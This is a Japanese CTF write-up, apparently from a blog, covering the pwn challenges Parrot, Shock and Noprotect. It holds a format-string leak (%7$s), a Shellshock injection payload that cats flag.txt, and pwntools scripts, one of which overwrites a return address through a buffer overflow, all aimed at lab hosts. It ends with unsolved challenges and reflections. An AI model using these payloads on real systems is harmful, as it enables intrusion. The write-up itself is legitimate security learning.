Staff > flag{gwAZLDpEHAg6}

[Pwn] Parrot (20pts)

僕はオウム。なんでも繰り返し言うよ。

書式文字列攻撃ができる。%1$sから試していって、%7$sでフラグが出た。なんで7なのかは分かってないですが。

__________                             __
\______   \_____ ______________  _____/  |_
 |     ___/\__  \\_  __ \_  __ \/  _ \   __\
 |    |     / __ \|  | \/|  | \(  <_> )  |
 |____|    (____  /__|   |__|   \____/|__|

 You > %7$s
Parrot > DUMMY-FLAG

[Pwn] Shock (20pts)

ショッカーを倒せ!

名前からしてShellShockっぽい。bash_4.3.0があるので確定。Ghidraで開くと丁寧にsetenv()しているので、そこに好きなコマンドを書き込めばよい。 パスが通っていないのでうまいことやる必要がある。今回は2回に分けて実行した。（ls *相当の処理とcat）

from pwn import *

binary_path = './shock'

# remote
context.binary = ELF(binary_path)
# p = process(binary_path)
p = remote('10.10.10.16', 1004)

payload = "() { :; }; echo *"
# > bash_4.3.0 chall flag.txt start.sh
payload = "() { :; }; /bin/cat flag.txt"
# flag{UgjiH6Ep3Xda}

p.sendlineafter('You ', payload)

print(p.recvall().decode('utf-8'))

[Pwn] Noprotect (30pts)

flags 関数呼び出し忘れちゃった。

flags() を呼べば勝ち。リターンアドレスをそこに指定すればよい。 オフセットはがちゃがちゃやってたら出てきました。

from pwn import *

binary_path = './noprotect'

# remote
elf = ELF(binary_path)
context.binary = elf
#p = process(binary_path)
p = remote('10.10.10.15', 1005)
flags = elf.symbols['flags']

payload = b'A' * (256 + 8)
payload += p64(flags)

p.sendlineafter('n0protec >', payload)
print(p.recvall().decode('utf-8'))

※時間ギリギリだったのでフラグがメモに残ってなかった…

解けなかった問題たち

• Crypto: Hash Extension Attack
• NW: Ladder
• Programming: LFSR Period, Grayscale Matrix
• Web: Location

それなりに足掻きましたがダメでした。うーん……ガッツがたりない……

感想

ﾌﾟﾌﾟｰあの人博士号持ってるのにcrypto問全然解けてないじゃないですか（笑）って言われてもぐうの音も出ない結果となりました。精進します。

という文字列を「waniCTF2023に参加した」からコピペしてきました。精進できませんでした。次こそは精進します。